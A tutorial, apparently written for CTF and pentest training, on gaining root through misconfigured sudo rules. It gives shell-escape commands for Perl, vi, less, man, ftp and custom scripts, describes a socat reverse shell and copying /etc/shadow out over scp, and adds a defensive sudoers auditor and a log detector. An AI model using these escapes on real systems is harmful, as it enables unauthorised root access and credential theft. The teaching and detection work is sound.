Abusing Sudo
Introduction ........................................................................................... 3
Sudoer File Syntax .................................................................................. 4
Traditional Method to assign Root Privilege ......................................... 5
Spawn Root Access ................................................................................. 6
Default Method to assign Root Privilege ............................................... 7
Spawn Root Access ................................................................................. 8
Allow Root Privilege to Binary commands............................................. 9
Spawn Root Access using Find Command ............................................ 10
Allow Root Privilege to Binary Programs ............................................. 11
Spawn shell using Perl .......................................................................... 11
Spawn shell using Python..................................................................... 12
Spawn shell using Less Command ........................................................ 12
Spawn shell using AWK ........................................................................ 13
Spawn shell using Man Command (Manual page)............................... 14
Spawn shell using Vi-editor (Visual editor) .......................................... 15
Allow Root Privilege to Shell Script ...................................................... 17
Spawn root shell by Executing Bash script ........................................... 19
Spawn root shell by Executing Python script ....................................... 19
Spawn root shell by Executing C Language script ................................ 20
Allow Sudo Right to other Programs ................................................... 20
Spawn Shell Using Env ......................................................................... 21
Spawn Shell Using FTP.......................................................................... 22
Spawn Shell Using Socat ...................................................................... 22
Spawn shell through SCP ...................................................................... 23
Page 2 of 23
Introduction
Earlier guides covered Linux privilege escalation with SUID binaries and with the /etc/passwd file; this one
covers privilege escalation through the sudoers file. When working through a CTF box, one of the first checks in
the privilege-escalation phase is sudo -l, which lists the commands the current user may run through sudo and
as whom. This guide walks through how that check, and the rules it reveals, lead to root.
The file /etc/sudoers is the configuration file for sudo on Linux and Unix. sudo ("superuser do") runs a
command as root or as another user. The sudoers file lists the users and groups that may use it and which
commands each of them may run, as root or as some other user. Take a look at the image below.
When you run a command through sudo, sudo looks up the invoking user (and the user's groups) in the sudoers
file. If no rule matches, the command is refused and the attempt is logged; if a rule matches, the command runs
with the privileges that rule grants, normally after sudo has asked for the user's own password.
The default rule for root, root ALL=(ALL:ALL) ALL, reads as: on ALL hosts, root may run ALL commands as ALL
users and ALL groups.
Sudoer File Syntax
If you (as root) want to grant sudo access to a specific user, edit the sudoers file with the visudo command;
it checks the syntax before saving, so a typo cannot lock everyone out of sudo. Under "User privilege
specification" you will see the usual root entry, root ALL=(ALL:ALL) ALL. The general shape of a rule is
user host_list=(runas_user:runas_group) TAG: command_list
where the Runas part in parentheses and the tag are both optional, as shown in the image below.
Consider the example where we want to let user raaz run the copy command (/bin/cp) with root privileges.
Here the NOPASSWD tag means raaz will not be asked for a password when running it.
Let’s Begin!!
Let's get into the practical work. First, create a user that is not a member of the sudo group. We've added
the user raaz, whose UID and GID are both 1002, so raaz is an ordinary, non-root user.
adduser raaz
Traditional Method to assign Root Privilege
If the system administrator wants to let user raaz run everything, he can add raaz to the User Privilege
Specification section as shown below. (ALL:ALL) means raaz may run the command as any user and any group;
(ALL) alone covers any user.
visudo
raaz ALL=(ALL:ALL) ALL
or
raaz ALL=(ALL) ALL
Spawn Root Access
On the other side, start your attacking machine, compromise the target, and then move to the
privilege-escalation phase. Suppose you have logged into the victim's machine over SSH as raaz and want to
know the sudo rights of the current user; run the commands below. In the traditional method the PASSWD
option is in effect, so sudo asks for raaz's own password when the commands run; it can be disabled with the
NOPASSWD tag. The highlighted text indicates that the current user is authorized to run all commands, so
sudo su gives a root shell, which id confirms.
ssh raaz@<target-ip>
sudo -l
sudo su
id
Default Method to assign Root Privilege
If the system administrator wants to give root permission to user raaz to execute all commands and
programs, then he can follow the below steps to add user raaz under the User Privilege Specification
category.
visudo
raaz ALL=ALL
or
raaz ALL=(root) ALL
Spawn Root Access
Again, compromise the target and move to the privilege-escalation stage as above, then run the commands
below to view the user's sudo rules.
ssh raaz@<target-ip>
sudo -l
The highlighted text indicates that user raaz may run all commands as root. A root shell follows from either
of the following:
sudo su
or
sudo bash
Note: Both methods above ask for the user's password when sudo -l (and every other sudo command) is run,
because the PASSWD option is in effect by default.
Allow Root Privilege to Binary commands
The user may instead be limited to particular programs, such as /bin/cp, /bin/cat or /usr/bin/find. A rule
of this kind still leads to root if the program can be made to run other commands or to read and write
arbitrary files. It is set up with the procedure below:
NOTE: The NOPASSWD tag here means no password is requested when raaz runs the listed command through sudo,
and sudo -l will not ask for one either.
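The following POSIX shell script is an added example, not part of the original guide: it breaks a sudoers "user privilege specification" line of the shapes shown above into its fields and reports what the rule really grants (full root, a program with a known shell escape, or a target file the user can overwrite). The rule strings it checks are constructed for the demo, and the list of dangerous programs is an assumption drawn from the programs this guide covers.

```shell
#!/bin/sh
# Added example (not from the original guide): parse a sudoers "user privilege
# specification" line and report what the rule really grants.
# The rule strings in the demo at the bottom are constructed for this example.

# Programs that hand the caller a root shell, or let it read/write any file, when
# run through sudo (an assumed list drawn from the programs this guide covers).
DANGEROUS_BINS="find perl python python3 less awk man vi vim nano env ftp socat scp cp cat"

# parse_sudoers_line 'raaz ALL=(ALL:ALL) NOPASSWD: /usr/bin/find'
# prints:  user|hosts|runas|tags|commands
# The Runas part "(...)" is optional and defaults to root; tags may be absent.
parse_sudoers_line() {
    line=$1
    user=${line%% *}                 # user name or %group
    rest=${line#* }
    hosts=${rest%%=*}                # Host_List, before the '='
    spec=${rest#*=}                  # everything after the '='
    runas=root
    case $spec in
        \(*\)*) runas=${spec#\(}; runas=${runas%%\)*}; spec=${spec#*') '} ;;
    esac
    tags=
    while :; do                      # peel off leading TAG: words (NOPASSWD:, SETENV:, ...)
        case $spec in
            [A-Z]*': '*) tags="$tags${tags:+,}${spec%%:*}"; spec=${spec#*': '} ;;
            *) break ;;
        esac
    done
    printf '%s|%s|%s|%s|%s\n' "$user" "$hosts" "$runas" "$tags" "$spec"
}

# audit_entry 'sudoers line' -> one-line verdict
audit_entry() {
    parsed=$(parse_sudoers_line "$1")
    tags=$(printf '%s' "$parsed" | cut -d'|' -f4)
    cmds=${parsed##*|}
    verdict=ok
    if [ "$cmds" = ALL ]; then
        verdict="full root"
    else
        old_ifs=$IFS
        IFS=,; set -f; set -- $cmds; set +f; IFS=$old_ifs   # split the Cmnd_List on commas
        for c in "$@"; do
            c=$(printf '%s' "$c" | sed 's/^ *//; s/ .*//')   # drop leading blanks and arguments
            base=${c##*/}
            for d in $DANGEROUS_BINS; do
                if [ "$base" = "$d" ]; then verdict="dangerous binary $base"; fi
            done
            # A world-writable target (the chmod 777 case in this guide) can be replaced
            # by the user, which is the same as granting ALL.
            if [ -n "$(find "$c" -prune -perm -002 -print 2>/dev/null)" ]; then
                verdict="writable target $c"
            fi
        done
    fi
    case $tags in *NOPASSWD*) verdict="$verdict, no password" ;; esac
    printf '%s\n' "$verdict"
}

# Demo on constructed rules
for rule in 'raaz ALL=(ALL:ALL) ALL' 'raaz ALL=ALL' \
            'raaz ALL=(root) NOPASSWD: /usr/bin/find' 'raaz ALL=(root) /bin/cp, /usr/bin/id'; do
    printf '%-42s -> %s\n' "$rule" "$(audit_entry "$rule")"
done
```

The parser understands the simple rule shapes used in this guide (one user, one host list, an optional Runas, tag words, a comma-separated command list); User_Alias/Cmnd_Alias, Defaults lines and #include directives are out of scope. The writable-target check is the one most audits forget: a rule naming a script is only as strong as the permissions on that script and its directory.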
Spawn Root Access using Find Command
Again, compromise the victim's system, move to the privilege-escalation phase, and run the command below
to view the user's sudo rules.
sudo -l
The highlighted text indicates that user raaz may run find as root. find's -exec action runs a program of the
caller's choice for every matched file, and because find itself runs as root, so does that program; a shell
started this way is therefore a root shell. We got root access by executing the commands shown below.
Allow Root Privilege to Binary Programs
Sometimes admins give a particular user the right to run interpreters or editors that can in turn edit any
system file, such as /etc/passwd. A number of such programs lead to privilege escalation when a user is
allowed to run them through sudo. In the rule below we have given raaz sudo rights to the following
programs, which can then be run as root.
Spawn shell using Perl
sudo -l
The highlighted text now indicates that user raaz may run Perl programs or one-liners as root. Perl's exec
replaces the interpreter with the named program, so we got root access with the one-liner below.
sudo perl -e 'exec "/bin/bash";'
id
Spawn shell using Python
sudo -l
The highlighted text indicates that user raaz may run Python programs or one-liners as root. Python's os
module can start a shell in the same way, so we acquired root access with a Python one-liner.
Spawn shell using Less Command
sudo -l
The highlighted text indicates that user raaz may run the less pager as root. Hence we obtained root access as
follows.
Running less through sudo opens the requested system file for viewing, but less also has a shell escape: at
its prompt type !bash as shown below and hit enter.
You will get root access as shown in the below image.
Spawn shell using AWK
sudo -l
The highlighted text indicates that user raaz may run AWK programs as root. AWK's system() function runs a
shell command, so we obtained root access with an AWK one-liner.
Spawn shell using Man Command (Manual page)
For privilege escalation, run the command below to view the user's sudo rules.
sudo -l
The highlighted text indicates that user raaz may run the man command as root. Therefore we got root access
as follows.
sudo man displays the manual page through a pager (less by default), so the same shell escape applies: type
!bash as shown below and hit enter, and you get root access just as with less above.
You will get root access as shown in the below image.
id
whoami
Spawn shell using Vi-editor (Visual editor)
sudo -l
The highlighted text indicates that user raaz may run the vi editor as root. Consequently we got root access
as follows.
sudo vi
It will open the vi editor, but vi can run an external command from its command line: type :!bash as shown
below and hit enter (the leading colon enters command mode, where :!command runs a command and :shell also
works), and you get a root shell, as with less above.
sudo vi
id
whoami
NOTE: sudo permission for pagers and editors such as less, man, vi and nano is very dangerous: besides their
shell escapes, they let the user read or edit any system file as root, which is privilege escalation in itself.
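The following detector is an added example, not part of the original guide: it reads sudo's syslog-style records and flags the abuses described above (find -exec, interpreter one-liners, pager and editor escapes, env and the other launchers, plus a direct su/bash). The log lines embedded in the script are constructed for the demo in the layout sudo writes ("user : TTY=... ; PWD=... ; USER=... ; COMMAND=..."), and the set of flagged programs is an assumption drawn from the sections above, not a complete list.

```shell
#!/bin/sh
# Added example (not part of the original guide): flag sudo log records in which a
# permitted binary is being used to break out to a root shell.  The sample records
# below are constructed for this demo in the layout sudo uses for its syslog lines.
SAMPLE_LOG='Mar  3 10:01:12 target sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/find /home -exec /bin/bash \;
Mar  3 10:02:40 target sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/perl -e exec "/bin/bash";
Mar  3 10:03:05 target sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/vi /etc/hosts
Mar  3 10:04:19 target sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/usr/bin/env /bin/bash
Mar  3 10:05:00 target sudo:     alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
Mar  3 10:06:22 target sudo:     raaz : TTY=pts/0 ; PWD=/home/raaz ; USER=root ; COMMAND=/bin/su'

# classify_command 'COMMAND text' -> reason string, or nothing if it looks benign
classify_command() {
    cmd=$1
    bin=${cmd%% *}              # the program path is the first word
    base=${bin##*/}
    case $base in
        su|bash|sh|dash|zsh)
            printf '%s\n' "direct root shell" ;;
        find)                   # find only matters with an action that runs a program
            case " $cmd " in
                *" -exec "*|*" -execdir "*|*" -ok "*|*" -okdir "*) printf '%s\n' "find -exec" ;;
            esac ;;
        perl|python|python2|python3|ruby|php|awk|gawk|mawk|lua|node)
            printf '%s\n' "interpreter run as root" ;;
        less|more|man|vi|vim|nano|ftp)
            printf '%s\n' "interactive program with a shell escape" ;;
        env|socat|scp)
            printf '%s\n' "launcher that can run any program" ;;
    esac
}

# detect_sudo_abuse < logfile -> one ALERT line per suspicious record
detect_sudo_abuse() {
    while IFS= read -r line; do
        case $line in *" sudo: "*" ; COMMAND="*) ;; *) continue ;; esac
        user=${line#*" sudo: "}; user=${user%%" :"*}
        set -- $user; user=$1                      # trim the padding sudo adds
        runas=${line#*" USER="}; runas=${runas%%" "*}
        cmd=${line#*"COMMAND="}
        reason=$(classify_command "$cmd")
        if [ -n "$reason" ]; then
            printf 'ALERT user=%s as=%s reason="%s" cmd=%s\n' "$user" "$runas" "$reason" "$cmd"
        fi
    done
}

# count_alerts -> number of ALERT lines produced for the constructed sample
count_alerts() {
    printf '%s\n' "$SAMPLE_LOG" | detect_sudo_abuse | grep -c '^ALERT'
}

printf '%s\n' "$SAMPLE_LOG" | detect_sudo_abuse
```

Point it at the real file with detect_sudo_abuse < /var/log/auth.log (or at journalctl output). The alerts only tell you that a risky program ran as root; whether that is an attack or the admin's intended use depends on the rule that allowed it, which is why the sudoers audit and the log detection belong together.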
Allow Root Privilege to Shell Script
It is common to find scripts that are run by the system or by some program; they may be written in Bash,
PHP, Python or C. Suppose you (the system admin) give sudo permission to a script that provides a bash shell
when executed.
For example, we have written three programs that give a bash shell when run, one each in Bash, Python and
C, and saved them as asroot.py, asroot.sh and asroot.c (compiled to the binary named shell) inside
/bin/script, as shown in the image below.
NOTE: While solving OSCP challenges, you will find that some scripts are hidden by the author to exploit
kernels or root shells and set sudo permission to any particular user to execute that script.
cat asroot.py
cat asroot.sh
cat asroot.c
gcc asroot.c -o shell
chmod 777 shell
ls
Now allow raaz to run all of the above scripts as root by adding them to the sudoers file with the following
command.
Note that the compiled binary was made world-writable with chmod 777 above. A sudo rule that names a file
raaz can overwrite is equivalent to giving raaz ALL: raaz simply replaces the file's contents and runs it as
root. The same holds if the script itself is writable by the user, or lives in a directory the user can write to.
Spawn root shell by Executing Bash script
For the privilege-escalation phase, run the command below to view the user's sudo rules.
sudo -l
The highlighted text indicates that user raaz may run asroot.sh as root. Therefore we got root access by
running the asroot.sh script.
sudo /bin/script/asroot.sh
id
sudo -l
Spawn root shell by Executing Python script
Now the highlighted text shows that user raaz may run asroot.py as root. Therefore we acquired root access
by executing the script.
sudo /bin/script/asroot.py
id
sudo -l
Spawn root shell by Executing C Language script
Here the highlighted text indicates that user raaz may run shell (the compiled asroot.c) as root. So we
obtained root access by executing that binary:
sudo /bin/script/shell
id
Allow Sudo Right to other Programs
Sudo rights may also be granted to other programs that can start a process or move files, such as env, FTP,
SCP or Socat. In the rule below we have given raaz sudo rights to the following programs, which can then be
run as root.
sudo -l
As we can observe, user raaz has sudo rights for env, FTP, SCP and Socat. Let's try to get root access
through them one by one.
Spawn Shell Using Env
env runs the program named on its command line (with whatever environment you give it), so when env is
allowed through sudo, naming a shell as that program gives a root shell.
Spawn Shell Using FTP
Now let's try to get root access through FTP with the help of the following commands. At the ftp> prompt,
! followed by a command runs that command through a shell, and ! alone (or ! /bin/sh) drops into a shell;
because ftp itself is running as root, so is that shell:
sudo ftp
whoami
or
! /bin/sh
id
whoami
Spawn Shell Using Socat
Socat can attach a shell to a network socket. Start a listener on your attacking machine, then run the
following command on the victim's machine through sudo, and you will get a root shell on your attacker's
machine.
Spawn shell through SCP
As we know, the sudo right is also available for SCP. SCP is a means of securely copying files between a local
host and a remote host, so rather than a shell it gives us root-level file access: we can use it to copy out
system files that require root permission to read, such as /etc/passwd and /etc/shadow, or to write files
back into privileged locations. (scp's -S option names the program to use as the ssh client, so sudo scp can
in fact be made to run an arbitrary program as root as well; the file-copy route below is the simplest use.)
Syntax: scp SourceFile user@host:~/path/to/directory
Now let's confirm the transfer by inspecting the remote directory; as you can observe, we have successfully
received the passwd and shadow files on our remote PC.
ls
cat shadow
www.ignitetechnologies.in